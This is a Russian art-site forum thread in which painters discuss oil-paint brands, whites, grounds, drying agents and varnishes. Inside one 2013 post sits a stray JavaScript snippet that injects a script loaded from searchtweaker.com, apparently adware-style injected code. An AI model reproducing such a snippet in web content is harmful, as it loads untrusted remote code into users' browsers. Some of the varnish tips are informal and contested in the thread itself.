Ваша корзинаИзбранное Личный кабинет

Сочетание лаков и масляных красок, борьба с пожуханием, последствия

24.09.2013,
00:49
Ambrosius

Цитата:
Сообщение от Александр Дементьев
краска Белый барит из серии Rublev. Очень прозрачные белила пергаментного цвета, на ореховом и льняном маслах тянущейся медовой консистенции. При смешивании с другой краской очень интересная техника письма вомзожна.


Так белила в принципе важны - это только поначалу кажется,что любые сгодятся, были бы белые :-) а вот потом оказывается, что не зря их столько видов существует.
Нет, я на Рублёва пока не замахиваюсь - освоить бы то, что есть. Открыл банку свинцовых Винзор и Ньютон (смесь цинковых и свинцовых) - они уже густеть начали. Я из расфасовал по пустым тюбикам, а на остатки сразу в дело пустил. Сохнут быстро, консистенция несколько иная, чем у любых других, и сохнут быстро.
Я, правда, писАл вот на этом масле, что выше на фото, с добавлением Рапида Шминке. Хочу сказать, что Рапид этот заметно отличается от Ликвина WN - высыхание действительно ускоряет, но не до безумия - пару дней все равно надо перед сворачиванием работы (из-за тинановых белил в конце) - надо было домой везти, вот и опробовал этот Рапид.
Вот так выглядит.

24.09.2013,
01:17
Александр Дементьев
Александр Дементьев


Я давно не использую вещества, ускоряющие высыхание краски. Мне вот не подходит быстрое высыхание - нравится работать алла-примно, по-сырому. Основной слой напишу, когда он высыхает, втираю масло и лессировочно пишу прозрачными Шминке Муссини. Это позволяет добиваться высоких результатов при небольших трудозатратах.
Что-то я засомневался в акриловых грунтах. Наум масляный грунт отвергал напрочь. Но вот не знаю, если перед работой хорошо протереть его скипидаром, тогда в будущем красочный слой не осыпется? как думаешь? Или я слишком наивен?
Я опробовал уже три серии дорогостоящих красок - Рублев, Шминке, Старая Голландия. Есть интересные наблюдения. Если что, обращайся =) .

24.09.2013,
02:55
Ambrosius

Цитата:
Сообщение от Александр Дементьев
не использую вещества, ускоряющие высыхание краски


Так и я не сторонник - я же написал - надо было сворачивать и транспортировать в рулоне.
Ну, нет - я пробовал делать сам клеевой грунт - покупной акриловый лучше. Ты учти, что грунты - как и краска белая - все разные. Я вот только что "сонетом" погрунтовал в России. Но разница есть по сравнению с тем, чем я грунтую здесь.
Таленсовский грунт попробуй, если достанешь - та же фирма делает, что и краски Олд Холланд.

24.09.2013,
02:57
Ambrosius

Цитата:
Сообщение от Александр Дементьев
Если что, обращайся =)


А смысл? Это всё пробовать надо, на пальцах тут мало что объяснишь :-)

24.09.2013,
04:10
NikeM
NikeM


Цитата:
Сообщение от Александр Дементьев
…опробовал уже три серии дорогостоящих красок - Рублев, Шминке, Старая Голландия. Есть интересные наблюдения. Если что, обращайся…

Интересно, обращаюсь: как оно по цене, по качеству и по соотношению цена/качество?
...

28.09.2013,
00:32
Игорьза50


Цитата:
Сообщение от Александр Дементьев
Но вот не знаю, если перед работой хорошо протереть его скипидаром, тогда в будущем красочный слой не осыпется? как думаешь? Или я слишком наивен?


есть сообщения что осыпаются - лучше обработать лаком, он создаст липкую основу.

28.09.2013,
01:00
Владимир Рогов
Владимир Рогов


Цитата:
Сообщение от Александр Дементьев
. Наум масляный грунт отвергал напрочь. Но вот не знаю, если перед работой хорошо протереть его скипидаром, тогда в будущем красочный слой не осыпется? как думаешь?


Цитата:
Сообщение от Игорьза50
есть сообщения что осыпаются - лучше обработать лаком, он создаст липкую основу.


у меня дома валяюцца две картины (..не мои.), написанные на фирменном картоне, грунт маслянный, где-то в 1970-73 - осыпались частично, :)) а грунт зато смотрится как новенький

26.10.2013,
20:54
ВАСИЛЬ82
ВАСИЛЬ82


[QUOTE=Александр Дементьев]
Василь, а вы какими красками работаете?
Масленые - невская палитра серия мастер класс и акварельками тоже их производства.
Недавно приобрёл акрил wisked colors производства сша. Наш акрил полное кака по сравнению.
Достоинство качественных красок в чистоте пигмента и насыщенности. То есть когда смешиваешь краски для учёбы, так называемые - результат не предсказуем. С хорошими красками при смешивании получишь то что хочешь, а не абы что то похожее, не зависимо от связующего
Масло растворяю лаком, тоже невским, даммарным или пихтой. Рисую тонкими слоями.Не жухнет не тускнеет не трескается и пока не выцветает. Хотя когда начинал тоже такие проблемы были. Здесь самое главное не торопиться и не путать технологии. Рисуешь алаприма рисуй по сырому и лучше ни чем не разбавлять, тем более лаком когда мазки пастозные- обязательно потрескается.Подсох у алаприма верхний слой значит ждёшь когда полностью просохнет. Читал что нужно поскребсти рисунок в незаметном месте ножом и если стружка крошится можно продолжать, а если длинная и гибкая то ещё сушить. Высох убрал верхнюю плёнку масла и тока тогда рисуй. "Масло с лаком и можно на следующий день писать" да можно если картанка весь этот день летом под солнцем пролежит . А если лак с кадмием смешать и зимой , красочному слою две недели не хватит. То есть сушить НУЖНО.
Раньше художники у каминов сушили, чтобы на следующий день работу продолжить. Теперь ик лампы есть или на кухне душегубку устраивать
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

27.10.2013,
01:04
Александр Дементьев
Александр Дементьев


"Интересно, обращаюсь: как оно по цене, по качеству и по соотношению цена/качество? "
NikeM, здравствуйте. Ну вот я работаю, боекомплект у меня на 90 % из них состоит - соотношение цена-качество у них приемлемое, в тюбиках зачастую только пигмент + масло. Старая голландия это краски из которых масло вообще не вытекает. как оно там введено хрен знает, и как вообще зафигачили столько пигмента, что тюбик не лопнул :D Мастер-класс уже бы и закончился. Но мне Рублев и Муссини больше понравились. Голландия хочет делать краски неземной красоты и ради этого в ход идут весьма капризные пигменты - моноазокраситель и диоксазин. Я посмотрел в справочнике, судя по официальным данным, половина этих красок будут менятся под действием света. Не надо питать иллюзий на счет Голландии. Это не вечные краски.

27.10.2013,
01:42
NikeM
NikeM


Цитата:
Сообщение от Александр Дементьев
…Старая голландия это краски из которых масло вообще не вытекает. как оно там введено хрен знает, и как вообще зафигачили столько пигмента, что тюбик не лопнул... ...Не надо питать иллюзий на счет Голландии. Это не вечные краски…

Короче, в итоге получается, что чудеса бывают, конечно, но слишком редко, что бы на них расчитывать.Что, в общем-то, ожидаемо. А вообще, с большой получки таки надо будет как-нибудь попробовать за что голландцы и французы деньги дерут.
...

27.10.2013,
02:59
Владимир Рогов
Владимир Рогов

Цитата:
Сообщение от ВАСИЛЬ82
Наш акрил полное кака по сравнению.


Зато адреналина прибавляет :D
Творчество - это ведь такая фигня, в котором надо что-то преодолевать и с чем-то там бороться

22.03.2024,
14:51
Марочкин Константин
Марочкин Константин


Добрый день.. , акрил-стирольный лак (Невская палитра) при финишном покрытии картины начал как-бы 'скатываться' на поверхности... как будто поверхность жирная и он за неё плохо цепляется. (Работа высохла, наносил губкой... даммарный ложится нормально)
Подскажите -надо ли 'обезжиривать' поверхность или его не стоит использовать как покрывной?
/спасибо/

22.03.2024,
16:47
Кожин Валерий
Кожин Валерий


Цитата:
Сообщение от Марочкин Константин

Добрый день.. , акрил-стирольный лак (Невская палитра) при финишном покрытии картины начал как-бы 'скатываться' на поверхности... как будто поверхность жирная и он за неё плохо цепляется. (Работа высохла, наносил губкой... даммарный ложится нормально)
Подскажите -надо ли 'обезжиривать' поверхность или его не стоит использовать как покрывной?
/спасибо/



То есть вы попробовали дамарный лак нанести на ту же самую работу и он лег нормально?

22.03.2024,
22:58
BVS-Odessa
BVS-Odessa


Цитата:
Сообщение от Марочкин Константин
Подскажите -надо ли 'обезжиривать' поверхность или его не стоит использовать как покрывной?



Свежий акрил-стирольный лак (до 3-х - месяцев с даты изготовления) ложится и высыхает хорошо. Просроченный - (в зависимости от качества партии изготовления) может долго сохранять липковатость.
Для более тонкого первого слоя попробуйте разбавить его очищенным бензином для зажигалок.

22.03.2024,
23:54
Соловьев Алексей
Соловьев Алексей


Цитата:
Сообщение от BVS-Odessa
Свежий акрил-стирольный лак (до 3-х - месяцев с даты изготовления) ложится и высыхает хорошо. Просроченный - (в зависимости от качества партии изготовления) может долго сохранять липковатость.



И все художественные магазины, где продают акрил-стирольный лак старше 3х месяцев торгуют просрочкой? Дядя, ты уверен?

25.03.2024,
18:54
Марочкин Константин
Марочкин Константин


Цитата:
Сообщение от Кожин Валерий

То есть вы попробовали дамарный лак нанести на ту же самую работу и он лег нормально?


..да, совершенно верно- лёг замечательно. Поэтому был удивлен такому "поведению". Кстати, акрил-стирольному 1.5 года, но он нормально сохнет и не липнет на иной поверхности. В дальнейшем буду 'обезжиривать' поверхность..

26.03.2024,
05:18
Соловьев Алексей
Соловьев Алексей


 'обезжиривать' дамарный лак?
"очищенным бензином для зажигалок."? Ну-ну...
Но у вас вряд ли получится обезжирить, если на картине нарисованы блины или сало, к примеру.

Надо ещё решить важнейшую задачу - из каких модалей зажигалок будете добывать бензин и чем его очищать.
И да! Спички на всякий случай спрячьте...

26.03.2024,
21:36
BVS-Odessa
BVS-Odessa


Цитата:
Сообщение от Марочкин Константин
Кстати, акрил-стирольному 1.5 года, но он нормально сохнет и не липнет на иной поверхности



Моим флакончикам с акрил-стирольным уже тоже более 2-х лет - все хорошо себя ведут. Первые партии были прозрачные - "как вода", нынче же - встречаются и с желтушным оттенком. А бензином стал разбавлять (до 30 - 50% от объема ) еще во времена акрил-фисташкового лака - это позволяет покрывать картину уже спустя всего лишь неделю после завершения. Наношу всегда кистью - быстро распределяя тонкий слой, без втираний. Для картин с большим сроком выдержки высыхания - по тонкой ровной живописи - достаточно протереть влажным марлевым тампоном, предварительно убрав пыль из мелких борозд мягкой щетинной кистью. А чтобы поверхность лишний раз не пылилась - в первый же день работы натягиваю на рамку прозрачную пленку для цветов ("стекло") - и при больших перерывах - о пыли уже не переживаю.
По поводу липковатости после высыхания акриловых лаков, если погуглите - особенно отмечают низкую температуру и влажность - как вредные факторы при нанесении.

26.03.2024,
22:01
BVS-Odessa
BVS-Odessa

22.04.2024,
21:02
AlexSulim
AlexSulim


Цитата:
Сообщение от Fortune
Уважаемые художники, посоветуйте пожалуйста:
"Наваяла" свою первую картину маслом. Краски разбавляла за неимением лучшего подсолнечным маслом. Она сохнет уже недели две, и всё равно пачкается ((((
Можно ли ускорить процесс высыхания?
Что бы картина дольше сохранилась небходимо покрывать лаком?
У меня есть такой готовый состав: терпентин+льняное масло+даммаровая смола. Подходит ли он для финальной обработки, вместо лака?



Даммарная смола в разведенном виде или в камешках? Подсолнечное масло относится к полувысыхающим маслам. Оно в чистом виде долго сохнет. Быстрее сохнет в смеси с пиненом или скипидаром и на свету. Лучше писать на льняном масле. Льняное масло относится к быстросохнущим. Лнл гуще, чем подсолнечное, но его можно разбавлять тоже пиненом или скипидаром. Также можно использовать льняное масло с подсолнечным.


Для того, чтобы оставлять сообщения в форуме, нужно авторизоваться.
Александровский Александр
Крюков канал, дождь
Александровский Александр. Крюков канал, дождь
36000 р.
Медведев Игорь
No words
Медведев Игорь. No words
54000 р.
Припутникова Наталия
Весна
Припутникова Наталия. Весна
90000 р.
Парошин Владимир
Лето
Парошин Владимир. Лето
95000 р.
Тарасенко Валерий
Апостол Павел
Тарасенко Валерий. Апостол Павел
760000 р.
Волосов Владимир
Прозрачная осень
Волосов Владимир. Прозрачная осень
65000 р.

Новости культуры Практические советы Наши выставки Рейтинг художественных сайтов Политика защиты и обработки персональных данныхО нас, контакты info@artnow.ru

© ArtNow.ru 2003–2024 | Использование материалов, размещенных на сайте, допускается только с согласия их авторов с обязательной ссылкой на ArtNow.ru

Работа добавлена в корзину